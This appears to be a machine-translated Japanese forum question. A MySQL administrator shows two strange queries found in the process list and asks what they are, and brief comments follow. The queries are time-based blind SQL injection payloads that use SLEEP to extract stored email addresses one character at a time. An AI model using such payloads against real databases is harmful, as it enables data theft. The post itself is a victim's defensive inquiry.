1
私はMySQLの管理者ユーザ によってSHOW FULL PROCESSLISTを実行すると、不思議なクエリ。
SHOW FULL PROCESSLIST;
を実行すると、私はいつもこの行を参照してください。
select * from user where email='' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(email AS CHAR),0x20) FROM admin_new.`user` ORDER BY email LIMIT 105,1),5,1))>102,0,5)))))ylrK) AND 'ncED'='ncED'
を毎回違う
select * from user where email='' AND (SELECT * FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(email AS CHAR),0x20) FROM admin_new.`user` ORDER BY email LIMIT 106,1),4,1))>96,0,5)))))rePG) AND 'xuFI'='xuFI'
それは何ですか? それは正常ですか? スクリプトでどのように見つけることができますか?
、それ固定、 –
は、攻撃者が何をしたのかを確認する方法はありますか? @Your Common Sense –
上記のように、これはデータベース構造に関する情報を抽出するクエリを調査しています。だから私はまだ何も有害ではないと言うでしょう。しかし、それは最初の攻撃ではないかもしれません。 –